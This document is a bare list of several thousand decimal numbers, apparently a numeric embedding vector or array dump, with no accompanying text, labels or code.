0.003542895894497633, 0.0269770585000515, 0.020664196461439133, 0.007150502409785986, -0.02023279294371605, 0.0035806435626000166, -0.0076933507807552814, 0.016522729769349098, -0.02230352722108364, 0.0020563534926623106, -0.006539348047226667, -0.0038574603386223316, -0.0020869113504886627, -0.0022073446307331324, -0.0017040412640199065, -0.02775358222424984, 0.016910990700125694, 0.0042744833044707775, -0.00877904798835516, -0.010957632213830948, -0.01397745218127966, -0.02100931853055954, -0.00339909503236413, 0.007376988884061575, 0.00562621233984828, -0.008203844539821148, -0.013395057991147041, 0.0014541870914399624, 0.05225726589560509, -0.0024518060963600874, -0.016191987320780754, -0.02368401549756527, -0.0177594181150198, -0.00803128257393837, -0.0014434020267799497, -0.010986392386257648, 0.0032696740236133337, -0.023856576532125473, 0.010698790661990643, -0.013725800439715385, 0.009498052299022675, 0.02806994505226612, 0.032470256090164185, 0.02342517487704754, 0.05228602513670921, 0.003582441247999668, 0.0012357893865555525, 0.012747954577207565, -0.00985755492001772, 0.008965989574790001, 0.02430235967040062, -0.0034781855065375566, 0.008498636074364185, -0.005989309400320053, -0.028357546776533127, -0.01565992273390293, -0.0022648649755865335, -0.02070733718574047, 0.015746204182505608, -0.01725611463189125, -0.012855804525315762, -0.004767001606523991, 0.010224247351288795, -0.013395057991147041, 0.009785654954612255, -0.007376988884061575, 0.003717254614457488, -0.03042828105390072, 0.009828794747591019, -0.03678428381681442, 0.01565992273390293, -0.0004118549113627523, 0.00561183225363493, -0.013136216439306736, 0.01117333397269249, -0.0038898156490176916, -0.015774963423609734, 0.007182857487350702, -0.008606486953794956, 0.0049719177186489105, -0.005791583098471165, 0.021757083013653755, -0.005051008425652981, 0.020275933668017387, 0.008656817488372326, -0.012165560387074947, 0.007671780418604612, -0.020635435357689857, 0.02069295570254326, -0.011726967059075832, -0.01063408050686121, 0.017026033252477646, -0.004655555821955204, -0.009490862488746643, 0.009454912506043911, 0.018162060528993607, -0.02884647063910961, 0.010058876127004623, 0.025093264877796173, 0.0007217010133899748, 0.023770296946167946, -0.001809195731766522, 0.0023331705015152693, 0.020664196461439133, 0.011295564472675323, 0.026272432878613472, -0.0006089071393944323, -0.034684788435697556, 0.013754560612142086, 0.016709670424461365, -0.01807577908039093, 0.02354021556675434, 0.003720849519595504, 0.005255924537777901, -0.0014460983220487833, -0.018449662253260612, 0.006373977288603783, -0.013574809767305851, -0.022979391738772392, 0.010698790661990643, 0.02136882022023201, -0.004544110037386417, 0.018090158700942993, 0.024834424257278442, -0.014416045509278774, -0.022619890049099922, -0.004033616743981838, -0.005011463072150946, -0.0004929676069878042, 0.014214723370969296, 0.019743870943784714, -0.011604736559092999, -0.005604641977697611, 0.01873726397752762, 0.019269326701760292, 0.021282540634274483, -0.015099099837243557, 0.00755673972889781, -0.023453934118151665, -0.007132526952773333, 0.005723277572542429, -0.03094596415758133, -0.024589961394667625, -0.020218413323163986, 0.008448305539786816, 0.009943835437297821, -0.0028167010750621557, -0.03888377547264099, -0.04949628561735153, -0.023453934118151665, 0.011863578110933304, -0.004112706985324621, 0.0028490563854575157, -0.0013211711775511503, -0.026272432878613472, -0.010253007523715496, 0.0166377704590559, 0.02517954632639885, 0.027767963707447052, 0.002911969320848584, 0.01632140763103962, -0.02023279294371605, 0.013776130974292755, -0.02270616963505745, -0.017946358770132065, -0.014984059147536755, -0.014286624267697334, 0.0245612021535635, 0.001834360882639885, -0.000058362962590763345, 0.03330430015921593, -0.013675469905138016, 0.013826461508870125, 0.0022217247169464827, -0.010943252593278885, -0.007305087987333536, 0.01901048608124256, 0.016709670424461365, -0.013049935922026634, -0.02868828922510147, 0.0038430802524089813, 0.0025776319671422243, 0.004026426468044519, -0.01662338897585869, 0.029795557260513306, -0.01993081159889698, -0.004314028657972813, -0.015544882975518703, 0.0054716262966394424, 0.03603651747107506, 0.014315384440124035, -0.006927610840648413, 0.02362649515271187, -0.0011036723153665662, 0.039832863956689835, -0.03523123264312744, -0.00823979452252388, 0.005090553779155016, 0.0035393007565289736, 0.02609987184405327, -0.002958704484626651, -0.005086958408355713, 0.03134860843420029, 0.003925765864551067, -0.03212513029575348, -0.008326075039803982, 0.012208700180053711, 0.014897778630256653, 0.012115229852497578, 0.006521373055875301, 0.0008317985921166837, -0.012589773163199425, 0.0009171804413199425, -0.02765292301774025, -0.003400892484933138, -0.009785654954612255, -0.024374261498451233, 0.012064899317920208, -0.01875164359807968, 0.05165329948067665, -0.005176834296435118, -0.005047413520514965, 0.005173238925635815, -0.025366486981511116, 0.01905362494289875, -0.008642436936497688, -0.015846865251660347, -0.006481827702373266, -0.017284873872995377, 0.034368425607681274, 0.0033451695926487446, 0.013768941164016724, -0.0005104933516122401, 0.010008545592427254, -0.0067874048836529255, 0.004626795649528503, -0.009109790436923504, 0.00673347944393754, -0.010303338058292866, -0.0011171536752954125, -0.01895296573638916, 0.045498620718717575, -0.00816070381551981, -0.04092574864625931, 0.012934895232319832, -0.029105311259627342, 0.0020797213073819876, -0.01478273794054985, -0.005273899994790554, -0.0014029580634087324, 0.009893504902720451, 0.019801391288638115, 0.00404080655425787, 0.014272243715822697, 0.005550716537982225, 0.004921587649732828, -0.02008899301290512, 0.030313240364193916, 0.012647293508052826, 0.0321538932621479, 0.009196070954203606, 0.023985998705029488, -0.0009526812937110662, -0.002579429419711232, 0.009548382833600044, 0.007743681315332651, 0.032987937331199646, -0.012913324870169163, -0.01983015052974224, -0.017443055287003517, -0.019427508115768433, 0.01177010778337717, 0.010547799989581108, -0.00025816765264607966, 0.020520394667983055, -0.02198716439306736, -0.011266804300248623, 0.0008686475921422243, -0.01909676566720009, -0.01899610459804535, 0.01580372452735901, -0.007233187556266785, -0.013697040267288685, -0.006147490348666906, -0.03804973140358925, 0.0006129515240900218, 0.0011827627895399928, -0.007743681315332651, 0.009109790436923504, -0.010943252593278885, -0.02549590915441513, -0.002318790415301919, -0.015012819319963455, 0.004910802468657494, -0.0028256885707378387, -0.01398464199155569, -0.0004961132653988898, 0.012316551059484482, -0.017701895907521248, 0.00800252240151167, 0.005665757227689028, -0.02400037832558155, -0.026746977120637894, -0.003408082528039813, 0.008577726781368256, -0.00996540579944849, -0.013258447870612144, -0.0027573832776397467, -0.0018325633136555552, 0.05375279486179352, -0.013991832733154297, -0.011475315317511559, -0.018550323322415352, 0.005284684710204601, -0.006898850668221712, -0.0165802501142025, 0.01356761995702982, -0.003940145950764418, 0.00038421814679168165, -0.001272638444788754, -0.0007679869304411113, 0.0014011604944244027, 0.01715545356273651, 0.010777881368994713, -0.008131943643093109, -0.00222711730748415, 0.018104540184140205, -0.029019031673669815, -0.011870767921209335, 0.026862017810344696, 0.03908509761095047, 0.021713944151997566, 0.008958798833191395, 0.023957237601280212, 0.00996540579944849, -0.02621491253376007, 0.0036633291747421026, -0.027207139879465103, -0.022849971428513527, -0.0014478957746177912, -0.028903990983963013, 0.017946358770132065, 0.01570306345820427, 0.011525645852088928, -0.01607694663107395, 0.011345895007252693, 0.0019413128029555082, -0.014099682681262493, -0.0035141357220709324, 0.00016065262025222182, -0.023439554497599602, -0.007308683358132839, -0.01527166087180376, 0.001977263018488884, 0.026862017810344696, -0.0005136390100233257, -0.013603569939732552, 0.013315968215465546, 0.02415855973958969, 0.002200154587626457, -0.0029838697519153357, 0.004073162097483873, 0.010087636299431324, -0.01987329125404358, 0.007988142780959606, 0.012000189162790775, 0.0018379559041932225, -0.014710837043821812, -0.010727550834417343, -0.00678380997851491, -0.004795761778950691, -0.005770013201981783, 0.004137872252613306, -0.0013346525374799967, -0.0018020056886598468, -0.020635435357689857, -0.027207139879465103, -0.02168518304824829, -0.005414105951786041, 0.005755633115768433, -0.02384219691157341, 0.02013213373720646, -0.0003451222728472203, 0.029738036915659904, -0.008735907264053822, 0.00005541391874430701, 0.009073839522898197, -0.07552425563335419, -0.014567036181688309, 0.027422841638326645, 0.010519039817154408, 0.0015593415591865778, -0.027566641569137573, 0.0026926726568490267, -0.008814997971057892, -0.006593273486942053, -0.029162831604480743, 0.016565868631005287, -0.016925372183322906, 0.006460257805883884, -0.007218807470053434, -0.009383011609315872, 0.01034647785127163, 0.01771627739071846, 0.01478273794054985, -0.02713523991405964, -0.01612008549273014, -0.017629995942115784, 0.013042746111750603, -0.006542942952364683, -0.003411677433177829, -0.015544882975518703, -0.020017091184854507, 0.02878895029425621, -0.006474637892097235, 0.021440722048282623, -0.026143012568354607, 0.006852115038782358, 0.0038071300368756056, 0.02713523991405964, 0.015875624492764473, 0.03511619195342064, 0.023827817291021347, 0.0018550322856754065, -0.00763583043590188, 0.012855804525315762, 0.004562085028737783, 0.005791583098471165, -0.011115813627839088, 0.0033865123987197876, 0.00829012505710125, 0.013783320784568787, 0.013963072560727596, 0.02853010781109333, -0.002595607191324234, -0.01607694663107395, 0.025625329464673996, 0.011504075489938259, -0.007384178694337606, 0.021023698151111603, 0.009196070954203606, 0.012381262145936489, 0.010864161886274815, -0.022001545876264572, -0.0017040412640199065, -0.01112300343811512, -0.0005149871576577425, -0.017543716356158257, 0.016795950010418892, -0.005151669029146433, -0.03543255478143692, -0.0319238118827343, -0.00500786816701293, 0.003275066614151001, 0.017687516286969185, -0.0020060231909155846, -0.015990665182471275, 0.022878730669617653, 0.009232020936906338, 0.033045459538698196, -0.005086958408355713, -0.011942668817937374, 0.0024428186006844044, -0.007959382608532906, -0.02599921077489853, 0.0046447706408798695, -0.004058782011270523, -0.0004785875207744539, 0.015501742251217365, 0.007006701081991196, -0.010001355782151222, -0.003517730627208948, -0.005737657658755779, 0.005683732684701681, 0.0141643937677145, 0.013704230077564716, -0.018291480839252472, -0.02868828922510147, 0.011144573800265789, 0.03413834422826767, -0.002831081161275506, 0.004802951589226723, -0.021296920254826546, 0.009907885454595089, 0.00030872266506776214, 0.006596868392080069, -0.0067874048836529255, 0.014969678595662117, 0.022677410393953323, 0.0001324541517533362, 0.021138738840818405, 0.0016276469686999917, 0.020736096426844597, -0.019643209874629974, -0.012129610404372215, -0.01335910800844431, 0.0046663410030305386, -0.02523706667125225, 0.015731824561953545, 0.024791283532977104, -0.012676053680479527, 0.0141356335952878, -0.0016734835226088762, -0.01873726397752762, -0.01387679111212492, -0.009469292126595974, -0.006880875211209059, -0.025265825912356377, 0.011619117110967636, -0.007477649487555027, 0.006852115038782358, 0.009771274402737617, -0.011798867955803871, 0.02487756498157978, 0.010526229627430439, -0.0003448975912760943, 0.00008942621207097545, 0.010864161886274815, -0.016982892528176308, -0.002016808371990919, 0.0032606865279376507, 0.008548966608941555, -0.008376405574381351, 0.011396225541830063, 0.0023637281265109777, 0.028760189190506935, 0.004332003649324179, 0.013402248732745647, -0.012640103697776794, 0.002058151178061962, 0.022634269669651985, -0.026071112602949142, 0.003009034786373377, 0.013150596991181374, 0.010418378747999668, -0.0020401759538799524, -0.0030719477217644453, 0.011978618800640106, 0.021771464496850967, -0.006075589917600155, 0.025366486981511116, -0.0063524069264531136, 0.016767190769314766, 0.005065388511866331, -0.007585499901324511, -0.01472521759569645, -0.03678428381681442, -0.0002135668764822185, -0.009102599695324898, -0.0007437205058522522, 0.018708502873778343, -0.02044849470257759, 0.010389618575572968, 0.009850365109741688, 0.012855804525315762, 0.002649532398208976, -0.01508471928536892, 0.01457422599196434, 0.002694470342248678, 0.022950630635023117, -0.002135444199666381, -0.00443985452875495, -0.004982702899724245, 0.0027753582689911127, 0.015674304217100143, -0.01791759766638279, 0.0070138913579285145, 0.004777786321938038, -0.0031780009157955647, -0.043226566165685654, 0.00016986487025860697, 0.01478273794054985, 0.001416439306922257, -0.010382428765296936, -0.0037747749593108892, -0.01467488706111908, -0.011813247576355934, -0.006323646754026413, -0.005525551270693541, -0.017443055287003517, -0.024172939360141754, -0.006963560823351145, 0.015688683837652206, 0.017112312838435173, -0.007722110953181982, 0.012632912956178188, -0.023468315601348877, -0.0021390391048043966, 0.00009285272244596854, 0.02563970908522606, 0.024690622463822365, 0.005636997055262327, 0.00042151653906330466, 0.0141068734228611, -0.0022684598807245493, 0.006294886581599712, 0.014998438768088818, -0.004731051158159971, 0.0048101418651640415, -0.005935383960604668, -0.0008282035705633461, -0.009354251436889172, -0.020060231909155846, 0.019125526770949364, 0.005417700856924057, -0.014840258285403252, 0.007535169832408428, 0.008095993660390377, 0.007995332591235638, 0.009001939557492733, -0.0320388525724411, 0.018090158700942993, -0.009253591299057007, -0.01606256514787674, 0.011137383058667183, 0.004019236657768488, -0.012208700180053711, -0.00862086657434702, 0.0025938095059245825, 0.011209283955395222, -0.02075047604739666, 0.017802556976675987, 0.0049898927100002766, -0.021814603358507156, 0.0035734535194933414, -0.01128118485212326, -0.018320240080356598, 0.031895048916339874, -0.03022695891559124, 0.00818946398794651, 0.021555762737989426, -0.015156620182096958, -0.0034314501099288464, 0.007463269401341677, 0.025927310809493065, 0.006794594693928957, -0.00446861470118165, -0.011504075489938259, 0.01004449650645256, -0.007391368970274925, -0.002732218010351062, 0.02996811829507351, 0.008980369195342064, -0.00048128378693945706, 0.017529334872961044, 0.020462874323129654, 0.0061906310729682446, -0.010655649937689304, -0.006679554004222155, 0.006517778150737286, -0.028645148500800133, 0.014049353078007698, -0.00023861970112193376, 0.022490467876195908, 0.027322180569171906, 0.004112706985324621, 0.009275161661207676, -0.0077940113842487335, -0.00985755492001772, 0.015027198940515518, -0.021555762737989426, 0.001977263018488884, -0.030773403123021126, 0.014768357388675213, -0.011259614489972591, -0.008124753832817078, 0.0056334021501243114, -0.011568786576390266, -0.006032449658960104, -0.04644770547747612, -0.01235969178378582, -0.017701895907521248, -0.008426735177636147, 0.002426641061902046, 0.02168518304824829, 0.004238532856106758, -0.0197294894605875, 0.000021794830900034867, -0.003158228239044547, -0.0026603175792843103, 0.012287790887057781, -0.009138550609350204, -0.013689850457012653, -0.03042828105390072, 0.012661673128604889, -0.01739991456270218, 0.0007589993765577674, -0.01171258743852377, 0.02609987184405327, 0.01174134761095047, 0.015789344906806946, -0.005838318727910519, 0.02023279294371605, 0.018363380804657936, 0.01879478432238102, -0.004917992278933525, -0.0005504880100488663, -0.021483860909938812, 0.004001261200755835, 0.0404655858874321, -0.007412938866764307, 0.011446555145084858, 0.001952097867615521, -0.0063524069264531136, 0.007700540591031313, -0.015099099837243557, -0.014221914112567902, -0.004227747675031424, -0.004188202787190676, -0.011266804300248623, 0.00939739216119051, 0.004231343045830727, -0.0233245138078928, -0.03733072802424431, 0.019269326701760292, -0.012496302835643291, 0.015544882975518703, -0.010030115954577923, 0.011015152558684349, -0.01761561632156372, 0.029033411294221878, -0.0029784771613776684, -0.01771627739071846, 0.00018615482258610427, -0.002606392139568925, 0.0092464005574584, -0.010979202575981617, 0.0036129988729953766, 0.008426735177636147, -0.0061870357021689415, -0.0016932561993598938, 0.013682660646736622, -0.007671780418604612, 0.015516122803092003, -0.005158858839422464, -0.005712492857128382, -0.003258889075368643, -0.014588606543838978, 0.022418567910790443, 0.0005347597762010992, -0.0005262215854600072, 0.0012411819770932198, -0.01715545356273651, 0.023985998705029488, -0.01941312849521637, 0.005223569460213184, 0.0013337538111954927, 0.011108622886240482, -0.007308683358132839, 0.007265543099492788, 0.009260781109333038, -0.008771858178079128, -0.006302076391875744, 0.011288374662399292, -0.0024086658377200365, -0.01392712164670229, -0.0006682250532321632, -0.0004615111683961004, 0.019902050495147705, -0.003357752226293087, 0.04167351499199867, 0.0019215401262044907, -0.00002648521331138909, -0.026027971878647804, 0.019082386046648026, -0.018320240080356598, 0.005439270753413439, -0.005647782236337662, 0.02569722943007946, 0.01212241966277361, -0.007132526952773333, -0.0005015057977288961, -0.005935383960604668, 0.00475262152031064, -0.027825484052300453, 0.007678970694541931, -0.011798867955803871, 0.015789344906806946, 0.03537503257393837, 0.021081218495965004, 0.016134466975927353, -0.0010075053432956338, 0.009059459902346134, -0.010447138920426369, 0.01847842149436474, 0.005148074124008417, 0.025093264877796173, 0.01397745218127966, 0.00944772269576788, 0.007035461254417896, -0.0018550322856754065, 0.010303338058292866, -0.0035195283126085997, 0.016709670424461365, 0.012036139145493507, -0.04118459299206734, -0.017428675666451454, 0.00947648286819458, 0.0010587344877421856, 0.007945002056658268, 0.005166049115359783, -0.00022255443036556244, 0.012043329887092113, -0.02131129987537861, 0.01184919849038124, 0.008534586057066917, -0.0059785242192447186, -0.003961716312915087, 0.020577915012836456, 0.01238845195621252, -0.00431043328717351, -0.0029928572475910187, 0.014588606543838978, 0.00305037759244442, 0.007359013427048922, -0.010907301679253578, -0.002778953406959772, -0.010540609247982502, 0.007294303271919489, 0.009311111643910408, 0.003753204829990864, 0.010001355782151222, 0.024705003947019577, -0.002906576730310917, -0.005518361460417509, 0.025654088705778122, -0.005849103443324566, 0.003828700166195631, -0.0006138503085821867, -0.01673842966556549, 0.004083946812897921, 0.013711420819163322, 0.01915428601205349, 0.006794594693928957, -0.012366881594061852, 0.010598129592835903, 0.027063338086009026, -0.025711609050631523, -0.01616322621703148, 0.008707147091627121, -0.026761356741189957, 0.007492029573768377, 0.0005450954777188599, 0.007362608797848225, -0.01037523802369833, 0.0196719691157341, 0.0017381940269842744, 0.005320635158568621, -0.0008812301675789058, -0.0043571689166128635, 0.039171379059553146, -0.017371155321598053, 0.014689266681671143, -0.004080351907759905, 0.004795761778950691, -0.00333438441157341, 0.0002824340481311083, -0.014509515836834908, 0.011374655179679394, -0.007071411702781916, -0.016048185527324677, -0.015099099837243557, -0.015717443078756332, -0.008541776798665524, 0.01885230466723442, -0.008038473315536976, -0.02723589912056923, -0.002192964544519782, -0.019326847046613693, -0.03209637105464935, 0.011655067093670368, 0.006686744280159473, 0.017169833183288574, -0.00229722005315125, -0.004177417606115341, 0.006956371013075113, -0.021972784772515297, -0.011209283955395222, -0.006898850668221712, 0.000059598751249723136, 0.007060626521706581, 0.005964144133031368, -0.0041270870715379715, 0.008764667436480522, 0.006388357374817133, -0.016134466975927353, -0.025912931188941002, -0.011036722920835018, 0.004641175735741854, 0.021814603358507156, 0.025610949844121933, -0.02739408053457737, -0.006675959099084139, 0.012596962973475456, -0.026746977120637894, 0.021383201703429222, -0.005956954322755337, 0.014531086198985577, -0.015588022768497467, 0.01411406323313713, 0.015415461733937263, -0.0049359677359461784, 0.002856246428564191, -0.002149824285879731, 0.004975512623786926, -0.0013157787034288049, -0.020836757495999336, 0.008376405574381351, 0.011655067093670368, -0.00033209030516445637, 0.0045836553908884525, -0.00864962674677372, -0.0006758644594810903, -0.0003147892712149769, -0.0036237838212400675, 0.012165560387074947, -0.0045836553908884525, -0.012676053680479527, -0.00698872609063983, 0.024848803877830505, -0.0006237365887500346, 0.009066649712622166, -0.007858721539378166, 0.00831888522952795, 0.003503350540995598, 0.00433919345960021, 0.006208606064319611, 0.013287208043038845, -0.011590356938540936, -0.02635871432721615, -0.006248151417821646, 0.004720265977084637, -0.0019071600399911404, 0.0032445089891552925, 0.0019646803848445415, -0.011360274627804756, 0.005554311443120241, 0.005921003874391317, -0.000081618272815831, 0.03048580139875412, -0.015789344906806946, -0.00021884706802666187, 0.014998438768088818, -0.018924204632639885, -0.007261947728693485, -0.015300421044230461, -0.0008223616750910878, -0.011007962748408318, 0.020060231909155846, 0.013164976611733437, -0.017141073942184448, 0.01156159583479166, -0.009692183695733547, 0.015055959112942219, -0.028184985741972923, -0.008225413970649242, -0.013150596991181374, -0.012057709507644176, -0.0007046246319077909, 0.003158228239044547, 0.003943740855902433, 0.007959382608532906, -0.01225903071463108, -0.00202759332023561, 0.020117752254009247, -0.010799450799822807, -0.03258529677987099, -0.01750057563185692, 0.007010296452790499, -0.03974658250808716, 0.0027501932345330715, -0.005169644020497799, -0.0007473155274055898, 0.030198199674487114, 0.018550323322415352, 0.019341228529810905, 0.011755727231502533, 0.002538086846470833, -0.004616010468453169, 0.023511454463005066, -0.0004415138391777873, -0.006248151417821646, 0.00980722438544035, 0.02100931853055954, 0.00875747762620449, -0.013581999577581882, 0.03583519533276558, -0.004864067304879427, -0.02538086660206318, -0.012294980697333813, -0.005460841115564108, 0.024805663153529167, 0.02492070384323597, -0.014926538802683353, 0.004885637201368809, 0.00934706162661314, 0.00880780816078186, -0.008232604712247849, -0.021483860909938812, -0.01125242467969656, -0.014121253043413162, -0.02069295570254326, 0.015415461733937263, 0.015170999802649021, -0.011496885679662228, -0.004001261200755835, -0.0028454612474888563, -0.016206366941332817, 0.021900884807109833, 0.01467488706111908, -0.03330430015921593, 0.007801201660186052, -0.0009706564014777541, -0.001305892365053296, -0.004698696080595255, -0.025366486981511116, 0.011238044127821922, -0.010267388075590134, -0.00042398812365718186, -0.019168665632605553, 0.008707147091627121, -0.021253779530525208, 0.024489302188158035, -0.020621055737137794, -0.012208700180053711, 0.016249507665634155, 0.0015108087100088596, -0.023971619084477425, -0.0033128142822533846, -0.001055139466188848, -0.012589773163199425, 0.016335787251591682, 0.006431497633457184, 0.006819759961217642, -0.02250484935939312, 0.028328787535429, 0.011273994110524654, -0.000012062990208505653, 0.007204427383840084, 0.008225413970649242, -0.000364445528248325, -0.011137383058667183, 0.0077580614015460014, -0.011885148473083973, -0.007279923185706139, 0.01879478432238102, 0.003284054109826684, -0.03635288029909134, 0.0014263256452977657, 0.002423045923933387, -0.004795761778950691, 0.0074057490564882755, 0.010001355782151222, 0.020319074392318726, -0.00619422597810626, -0.03068712167441845, -0.00018727827409747988, -0.005015057977288961, 0.013057125732302666, 0.0013103861128911376, -0.021124359220266342, 0.010828211903572083, 0.01586124487221241, -0.009124170057475567, 0.0007666387828066945, -0.014567036181688309, 0.008491446264088154, 0.0088797090575099, -0.018780404701828957, -0.0057160877622663975, -0.016450827941298485, 0.03537503257393837, 0.011331514455378056, -0.01460298616439104, 0.0019053625874221325, -0.009692183695733547, 0.0053422050550580025, 0.002378108212724328, -0.005367370322346687, -0.0037567997351288795, 0.001726510119624436, -0.015990665182471275, 0.005090553779155016, 0.00438952399417758, 0.0067874048836529255, 0.0030036424286663532, -0.0035644660238176584, 0.0006120527978055179, -0.009922265075147152, -0.017629995942115784, -0.004802951589226723, -0.008692767471075058, 0.0005850901361554861, -0.0035716560669243336, -0.01771627739071846, -0.0063308365643024445, -0.004630390554666519, 0.012417212128639221, 0.018248340114951134, 0.019240567460656166, -0.04063814878463745, 0.0165802501142025, 0.01936998777091503, 0.0008758376352488995, -0.01761561632156372, -0.013883981853723526, 0.010181107558310032, -0.009339871816337109, -0.01096482202410698, -0.014243483543395996, 0.026128632947802544, 0.004680721089243889, 0.023914096876978874, -0.020017091184854507, -0.018090158700942993, -0.0040479968301951885, 0.014660506509244442, -0.0031276706140488386, -0.01863660290837288, 0.024992605671286583, 0.003936551045626402, 0.007186452392488718, 0.014214723370969296, 0.000929313653614372, -0.013970262371003628, 0.006693934090435505, -0.014229103922843933, -0.009929455816745758, -0.008354835212230682, -0.0018020056886598468, 0.012424401938915253, 0.010317717678844929, -0.0003284952836111188, 0.01859346218407154, -0.01931246742606163, 0.02769606187939644, -0.0036058088298887014, -0.0018038031412288547, 0.0031132905278354883, -0.009383011609315872, -0.013553239405155182, 0.007085791788995266, 0.003551883390173316, 0.0009185285889543593, -0.02254798822104931, -0.02389971725642681, -0.0007356317364610732, -0.013100266456604004, -0.00823979452252388, 0.0012546633370220661, 0.016551489010453224, -0.005698112770915031, -0.01873726397752762, -0.0007742782472632825, -0.017788177356123924, 0.0036543416790664196, 0.027063338086009026, -0.017701895907521248, 0.0016986486734822392, 0.011971428990364075, 0.019168665632605553, 0.021512622013688087, 0.007269138004630804, -0.019441887736320496, -0.004835307132452726, -0.002261269837617874, -0.026243673637509346, -0.02878895029425621, 0.001952097867615521, -0.01107267290353775, 0.024187318980693817, -0.008426735177636147, -0.001366109005175531, 0.0036471516359597445, 0.015616782940924168, -0.0013103861128911376, -0.013143407180905342, -0.0032283312175422907, 0.009311111643910408, 0.01120209414511919, -0.009109790436923504, -0.010217057541012764, 0.020275933668017387, 0.0031869886443018913, 0.015099099837243557, 0.00040736113442108035, 0.003929360769689083, 0.0064171175472438335, 0.005381750408560038, 0.008088802918791771, -0.00036804054980166256, -0.0038646506145596504, -0.0515957809984684, -0.009498052299022675, 0.010267388075590134, -0.0004916195175610483, 0.0016788761131465435, -0.00001596696165506728, 0.017572475597262383, -0.012072090059518814, -0.0034799829591065645, 0.028875229880213737, -0.007815581746399403, 0.011806057766079903, -0.013869601301848888, 0.0033793223556131124, -0.001347235171124339, -0.011827628128230572, 0.014279434457421303, -0.01591876521706581, 0.004763406235724688, 0.004536919761449099, -0.002293625148013234, -0.0028418663423508406, 0.00561183225363493, -0.011705397628247738, -0.028774570673704147, 0.029910597950220108, 0.0021731918677687645, 0.009088220074772835, 0.004141467157751322, 0.004213367588818073, 0.021541381254792213, -0.030974725261330605, 0.0027358131483197212, -0.003893410786986351, 0.019082386046648026, -0.01174134761095047, -0.025769129395484924, 0.019528169184923172, -0.001858627307228744, -0.00125556206330657, -0.00578079791739583, 0.015544882975518703, 0.011468125507235527, 0.011935479007661343, 0.00237631076015532, -0.016767190769314766, 0.005921003874391317, 0.010022926144301891, -0.009339871816337109, 0.024072278290987015, -0.017629995942115784, -0.008390785194933414, -0.00027434524963609874, 0.024489302188158035, 0.010648460127413273, 0.011238044127821922, 0.004263698123395443, 0.006071995012462139, 0.012517872266471386, 0.012661673128604889, -0.0022648649755865335, -0.0011252424446865916, -0.010324908420443535, 0.007330253254622221, 0.027940524742007256, 0.0024895539972931147, 0.012266220524907112, -0.00025007882504723966, -0.02033345401287079, -0.004472209606319666, 0.00808161310851574, 0.00023974313808139414, -0.005967739503830671, 0.013179357163608074, 0.0014047555159777403, -0.008095993660390377, 0.031118525192141533, 0.007786821573972702, 0.01066284067928791, -0.010576560162007809, 0.028041185811161995, 0.007448889315128326, -0.013531669043004513, 0.009713754057884216, 0.0029892621096223593, 0.0038574603386223316, 0.008843758143484592, 0.0051804292015731335, -0.013697040267288685, -0.0184928011149168, 0.027940524742007256, 0.015357941389083862, 0.0024032732471823692, 0.018406521528959274, 0.007369798608124256, -0.0038502702955156565, -0.026085492223501205, 0.0066400086507201195, -0.005403320770710707, -0.02683325670659542, 0.026560034602880478, -0.019542548805475235, 0.008592106401920319, -0.03295917809009552, 0.01403497252613306, 0.006600463762879372, 0.010159537196159363, -0.0008380899089388549, -0.002412260975688696, -0.0000999304247670807, 0.008548966608941555, -0.008786237798631191, -0.010389618575572968, 0.00875028781592846, -0.017141073942184448, 0.015573643147945404, -0.01460298616439104, -0.01233093161135912, -0.01801825873553753, 0.005047413520514965, -0.02539524808526039, -0.017529334872961044, -0.002070733578875661, -0.009692183695733547, -0.004360763821750879, -0.0116622569039464, 0.011748537421226501, 0.021239399909973145, 0.004188202787190676, 0.00022929511032998562, -0.002579429419711232, -0.00045544456224888563, 0.005698112770915031, -0.005284684710204601, 0.008527396246790886, -0.01158316619694233, 0.008894088678061962, 0.0209661778062582, 0.009526812471449375, -0.0046232002787292, -0.007614260073751211, -0.002387095708400011, 0.006859305314719677, 0.008376405574381351, -0.021038079634308815, -0.004170227330178022, 0.0005104933516122401, 0.011396225541830063, -0.010749121196568012, -0.010734740644693375, -0.0006053121178410947, -0.014221914112567902, 0.012985225766897202, 0.012489112094044685, 0.0002745699312072247, -0.021239399909973145, 0.031032245606184006, -0.004824521951377392, 0.004101922269910574, -0.013610759750008583, 0.03178000822663307, 0.019643209874629974, 0.0026764951180666685, -0.004767001606523991, -0.017342394217848778, 0.009116980247199535, -0.003767584916204214, -0.006244556047022343, 0.016565868631005287, -0.010777881368994713, -0.0036992793902754784, 0.0004556692438200116, 0.023238234221935272, 0.00762145034968853, 0.002286435104906559, -0.01467488706111908, 0.01223027054220438, -0.007527979556471109, -0.010396808385848999, 0.014480755664408207, -0.016048185527324677, -0.007513599470257759, 0.000368714623618871, 0.0015278850914910436, -0.009663423523306847, 0.026200532913208008, -0.023252613842487335, -0.007657400332391262, 0.019298087805509567, -0.02368401549756527, 0.00757111981511116, -0.005399725399911404, -0.01110143307596445, -0.003458412829786539, 0.008498636074364185, 0.003575251204892993, -0.002773560816422105, 0.021613283082842827, -0.003485375549644232, -0.02204468473792076, 0.01356761995702982, -0.0020653412211686373, 0.007477649487555027, 0.021153120324015617, 0.014272243715822697, 0.02599921077489853, 0.020261554047465324, -0.000057520381233189255, -0.002295422600582242, -0.016910990700125694, 0.017903218045830727, -0.0015314801130443811, 0.0030719477217644453, -0.0012591570848599076, 0.00763583043590188, -0.009490862488746643, 0.015099099837243557, 0.023051291704177856, -0.013732990249991417, 0.015731824561953545, 0.010914492420852184, -0.020419735461473465, -0.02192964404821396, 0.005665757227689028, 0.006571703590452671, 0.012072090059518814, -0.00236193067394197, -0.021397581323981285, 0.0032696740236133337, -0.008218224160373211, 0.005072578322142363, -0.014531086198985577, 0.011245233938097954, 0.010360858403146267, -0.02254798822104931, -0.008491446264088154, -0.007995332591235638, 0.0034296526573598385, -0.004961132537573576, 0.013229687698185444, -0.002196559449657798, -0.013013985939323902, -0.0016402296023443341, 0.010713170282542706, 0.0035482884850353003, -0.004317623563110828, 0.010116396471858025, 0.001366109005175531, 0.021872123703360558, -0.030054397881031036, -0.004713076166808605, 0.008901278488337994, 0.0011584963649511337, -0.0018640197813510895, -0.010296148248016834, -0.0017876256024464965, -0.005460841115564108, 0.013085885904729366, 0.008347645401954651, 0.0018289682921022177, -0.006118730176240206, 0.006913230754435062, -0.020664196461439133, -0.0038502702955156565, 0.006453067529946566, -0.007923432625830173, -0.004838902037590742, -0.005122908856719732, 0.00527749489992857, 0.0014622758608311415, 0.019240567460656166, 0.025812270119786263, -0.022015925496816635, -0.02523706667125225, 0.0037819650024175644, 0.0059605492278933525, -0.013833651319146156, -0.007427318952977657, -0.009684993885457516, -0.007412938866764307, -0.029321013018488884, 0.00072889105649665, 